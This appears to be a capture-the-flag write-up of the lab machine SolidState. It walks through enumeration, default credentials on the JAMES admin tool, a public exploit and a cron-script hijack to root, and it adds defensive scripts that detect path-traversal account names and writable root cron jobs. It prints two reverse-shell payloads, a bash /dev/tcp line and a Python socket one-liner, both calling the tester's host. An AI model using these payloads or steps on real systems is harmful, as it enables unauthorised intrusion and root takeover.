# SolidState

`JAMES` `cron`

* Machine name: SolidState
* Difficulty: Medium
* OS: Linux

## Enumeration

### NMAP

```
Nmap scan report for 10.10.10.51
Host is up (0.032s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.12 [10.10.14.12])
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:
```

### JAMES Remote Administration Tool 2.3.2

```
┌──(kali㉿kali)-[~]
└─$ nc -nv 10.10.10.51 4555
(UNKNOWN) [10.10.10.51] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
```

root:root works.

## Initial access

{% embed url="https://www.exploit-db.com/exploits/50347" %}

```
┌──(kali㉿kali)-[~/htb/solid]
└─$ python exploit.py 10.10.10.51 10.10.14.12 1234
[+]Payload Selected (see script for more options):  /bin/bash -i >& /dev/tcp/10.10.14.12/1234 0>&1
[+]Example netcat listener syntax to use after successful execution: nc -lvnp 1234
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).
[+]Don't forget to start a listener on port 1234 before logging in!
```

We ran it and started the listener, which is now waiting for a connection.

We go back to port 4555 with root:root.

```
listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin

setpassword james password
Password for james reset
setpassword thomas password
Password for thomas reset
setpassword mindy password
Password for mindy reset
setpassword mailadmin password
Password for mailadmin reset
```
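The second entry in that list is not a real account name but a relative path made of `../` segments, which tells us the server accepted a name that resolves outside its own user directory. As an added example (not from the original write-up and not Apache James code), the check below is what a user repository should enforce before creating an account, together with a scan of `listusers` output that flags existing names failing it. The repository root path is a hypothetical placeholder and the sample output is constructed from the listing above.

```python
"""Detect mailbox names that escape the user repository directory.

Added example, not part of the original write-up or of Apache James.
An account name is only acceptable if it is well-formed and, once joined
to the repository root and normalised, still lies inside that root.
"""
import os
import re

# Hypothetical repository root; the real location is deployment-specific.
REPOSITORY_ROOT = "/var/lib/james/users"

# Conservative allow-list: letters, digits, dot, dash, underscore; 1 to 64 chars.
NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def resolves_inside(base, name):
    """True if base/name, after normalisation, is still under base."""
    base = os.path.abspath(base)
    target = os.path.abspath(os.path.join(base, name))
    return target == base or target.startswith(base + os.sep)


def safe_mailbox_name(name, base=REPOSITORY_ROOT):
    """Accept a name only if it is well-formed and cannot escape the repository."""
    if not NAME_RE.match(name):
        return False
    # The regex already forbids separators; the path check catches anything a
    # looser naming policy would let through.
    return resolves_inside(base, name)


def suspicious_users(listusers_output):
    """Return the account names in JAMES 'listusers' output that fail validation."""
    bad = []
    for line in listusers_output.splitlines():
        line = line.strip()
        if not line.startswith("user:"):
            continue
        name = line[len("user:"):].strip()
        if not safe_mailbox_name(name):
            bad.append(name)
    return bad


# Constructed sample mirroring the listusers output seen above.
SAMPLE_LISTUSERS = """\
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
"""

if __name__ == "__main__":
    for name in suspicious_users(SAMPLE_LISTUSERS):
        print("suspicious account name:", name)
```

Run against the captured `listusers` output, `suspicious_users` returns only the traversal-style entry; the real accounts pass both the allow-list and the path check.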

We listed the users and then reset their passwords. Now let's see whether we can read mail over POP3.

```
┌──(kali㉿kali)-[~]
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
user mindy
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
pass password
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836

retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James
```

```
┌──(kali㉿kali)-[~]
└─$ ssh mindy@10.10.10.51    
mindy@10.10.10.51's password: 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
{...}
```

The shell is restricted, but we get a connection back on our listener on port 1234.

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234                    
listening on [any] 1234 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.51] 47986
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
```

## Privilege escalation

We download pspy32 to the target, make it executable and run it.

```
2024/11/06 05:45:01 CMD: UID=0     PID=2601   | /usr/sbin/CRON -f 
2024/11/06 05:45:01 CMD: UID=0     PID=2602   | /usr/sbin/CRON -f 
2024/11/06 05:45:01 CMD: UID=0     PID=2603   | python /opt/tmp.py 
2024/11/06 05:45:01 CMD: UID=0     PID=2604   | python /opt/tmp.py 
2024/11/06 05:45:01 CMD: UID=0     PID=2605   | sh -c rm -r /tmp/*
```

Let's see what the tmp.py file contains.

```
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()
```

We have write permission on it, so we can replace it with a reverse shell.

```
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
cat tmp.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
```

Now we just wait...

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1235                    
listening on [any] 1235 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.51] 37304
root@solidstate:~# whoami
whoami
root
```
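The escalation above comes down to one misconfiguration: a cron job running as root executes a file that an unprivileged user can write. The script below is an added example (not part of the original write-up) that audits `/etc/crontab`-style entries for exactly that condition. It extracts the executed file from each root job, including the script behind an interpreter such as `python /opt/tmp.py`, and reports files that are not root-owned, world- or group-writable, symlinks, or sitting in a world-writable directory. The crontab text and the file tree it checks are constructed to mirror what pspy showed; on a real host, feed it the actual `/etc/crontab` and keep the default `root_prefix` and `trusted_uid`.

```python
"""Audit system cron entries for scripts a non-root user could modify.

Added example, not part of the original write-up. It recreates the
SolidState misconfiguration in a temporary directory (a root cron job
running /opt/tmp.py while that file is world-writable) and reports it.
"""
import os
import re
import shlex
import stat
import tempfile

# Interpreters whose first argument is the file actually executed.
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "dash", "perl"}

# Constructed /etc/crontab-style sample; the /opt/tmp.py job mirrors the pspy output.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user  command
*/3 *  * * *   root    python /opt/tmp.py
17  *  * * *   root    cd / && run-parts --report /etc/cron.hourly
25  6  * * *   root    /usr/local/sbin/rotate-logs.sh
0   1  * * *   mindy   /home/mindy/backup.sh
"""


def parse_system_crontab(text):
    """Yield (user, command) for each job line in /etc/crontab format."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:  # environment assignment such as SHELL=
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            yield fields[5], fields[6]


def executed_files(command):
    """Return absolute paths of programs or scripts a cron command executes."""
    files = []
    for segment in re.split(r"\s*(?:&&|\|\||;|\|)\s*", command):
        try:
            argv = shlex.split(segment)
        except ValueError:
            continue
        if not argv:
            continue
        # For "python /opt/tmp.py" the interesting file is the script, not the interpreter.
        idx = 1 if os.path.basename(argv[0]) in INTERPRETERS else 0
        if idx < len(argv) and argv[idx].startswith("/"):
            files.append(argv[idx])
    return files


def modifiable_by_non_root(path, root_prefix="", trusted_uid=0):
    """Return why a non-root user could change the file, or None if it looks safe."""
    real = root_prefix + path
    try:
        st = os.lstat(real)
    except FileNotFoundError:
        return "does not exist"
    if stat.S_ISLNK(st.st_mode):
        return "is a symlink"
    if st.st_uid != trusted_uid:
        return "owned by uid %d" % st.st_uid
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        return "group-writable (gid %d)" % st.st_gid
    parent = os.lstat(os.path.dirname(real))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        return "parent directory is world-writable"
    return None


def audit(crontab_text, root_prefix="", trusted_uid=0):
    """List (user, path, reason) for root jobs whose files a non-root user could alter."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue  # only privileged jobs hand out uid 0
        for path in executed_files(command):
            reason = modifiable_by_non_root(path, root_prefix, trusted_uid)
            if reason:
                findings.append((user, path, reason))
    return findings


def build_fixture():
    """Create a throwaway tree reproducing the SolidState layout; return its root."""
    root = tempfile.mkdtemp(prefix="cron-audit-")
    layout = {  # constructed modes: tmp.py writable by everyone, the others not
        "/opt/tmp.py": 0o777,
        "/usr/local/sbin/rotate-logs.sh": 0o700,
        "/home/mindy/backup.sh": 0o755,
    }
    for path, mode in layout.items():
        full = root + path
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(full, mode)
    for dirpath, _, _ in os.walk(root):
        os.chmod(dirpath, 0o755)
    return root


def demo():
    """Audit the fixture; its files are owned by us, so our uid plays the trusted owner."""
    return audit(SAMPLE_CRONTAB, root_prefix=build_fixture(), trusted_uid=os.getuid())


if __name__ == "__main__":
    for user, path, reason in demo():
        print("%s job runs %s: %s" % (user, path, reason))
```

Running the file prints a single finding for `/opt/tmp.py`. Jobs for other users are skipped on purpose: a user overwriting a script that runs as that same user gains nothing, whereas any root job reading a file others can change is the pattern that turned mindy into root here.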
